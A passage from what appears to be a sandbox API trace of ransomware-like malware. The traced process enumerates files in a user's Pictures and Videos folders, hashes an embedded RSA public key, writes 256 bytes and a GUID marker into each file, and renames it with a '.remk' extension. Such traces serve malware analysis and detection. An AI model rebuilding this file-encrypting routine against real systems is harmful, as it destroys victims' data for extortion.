phProv=0x3adfa50*=0x695278) returned 1 [0234.511] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.511] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.511] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.511] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0234.511] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.511] GetLastError () returned 0x0 [0234.511] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.511] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0234.511] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.511] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.511] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.511] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.512] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.512] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0234.512] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xc27b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.512] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.513] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.513] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.513] CloseHandle (hObject=0x640) returned 1 [0234.518] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e698 [0234.518] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x325d3b0 [0234.518] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\ivWs qFi.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\ivws qfi.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\ivWs qFi.bmp.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\ivws qfi.bmp.remk")) returned 1 [0234.523] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46158110, ftCreationTime.dwHighDateTime=0x1d5e39e, ftLastAccessTime.dwLowDateTime=0xd0338950, ftLastAccessTime.dwHighDateTime=0x1d5d8e0, ftLastWriteTime.dwLowDateTime=0xd0338950, ftLastWriteTime.dwHighDateTime=0x1d5d8e0, nFileSizeHigh=0x0, nFileSizeLow=0xb2a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_UQ7F5NbCFJ6.jpg", cAlternateFileName="_UQ7F5~1.JPG")) returned 1 [0234.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0234.523] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xbe) returned 0x31c7810 [0234.523] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\_UQ7F5NbCFJ6.jpg") returned=".jpg" [0234.524] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\_UQ7F5NbCFJ6.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\_uq7f5nbcfj6.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.525] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=2858) returned 1 [0234.525] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.527] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xb04, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.527] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.529] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.529] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xb2a, lpOverlapped=0x0) returned 1 [0234.529] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.529] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0234.529] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.529] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.529] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0234.530] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.530] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.530] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.530] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0234.530] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.530] GetLastError () returned 0x0 [0234.530] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.530] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0234.530] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.530] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.530] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.530] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.530] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.531] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0234.531] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xb2a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.531] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.531] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.531] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.531] CloseHandle (hObject=0x640) returned 1 [0234.533] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6420 [0234.533] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x325d3b0 [0234.533] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\_UQ7F5NbCFJ6.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\_uq7f5nbcfj6.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\_UQ7F5NbCFJ6.jpg.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\_uq7f5nbcfj6.jpg.remk")) returned 1 [0234.543] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46158110, ftCreationTime.dwHighDateTime=0x1d5e39e, ftLastAccessTime.dwLowDateTime=0xd0338950, ftLastAccessTime.dwHighDateTime=0x1d5d8e0, ftLastWriteTime.dwLowDateTime=0xd0338950, ftLastWriteTime.dwHighDateTime=0x1d5d8e0, nFileSizeHigh=0x0, nFileSizeLow=0xb2a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_UQ7F5NbCFJ6.jpg", cAlternateFileName="_UQ7F5~1.JPG")) returned 0 [0234.543] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0234.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0234.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0234.543] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0234.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba600 [0234.543] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0234.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.543] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0234.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x37bfdb0 [0234.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0234.544] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0234.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0234.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0234.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.545] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0234.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0234.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0234.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x37bfdb0 [0234.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0234.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x37bfdb0 [0234.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0234.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0234.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.548] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\g1CuCps yZIAOwjCa\\") returned="g1CuCps yZIAOwjCa\\" [0234.548] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0234.548] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0234.548] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0234.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0234.548] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0234.548] PathFindFileNameW (pszPath="") returned="" [0234.548] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\g1CuCps yZIAOwjCa\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x37f59a00, ftCreationTime.dwHighDateTime=0x1d5e65c, ftLastAccessTime.dwLowDateTime=0x42b5a5c0, ftLastAccessTime.dwHighDateTime=0x1d5e576, ftLastWriteTime.dwLowDateTime=0x42b5a5c0, ftLastWriteTime.dwHighDateTime=0x1d5e576, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0234.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0234.549] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x37f59a00, ftCreationTime.dwHighDateTime=0x1d5e65c, ftLastAccessTime.dwLowDateTime=0x42b5a5c0, ftLastAccessTime.dwHighDateTime=0x1d5e576, ftLastWriteTime.dwLowDateTime=0x42b5a5c0, ftLastWriteTime.dwHighDateTime=0x1d5e576, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0234.549] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41119ea0, ftCreationTime.dwHighDateTime=0x1d5de63, ftLastAccessTime.dwLowDateTime=0x6a100cf0, ftLastAccessTime.dwHighDateTime=0x1d5db49, 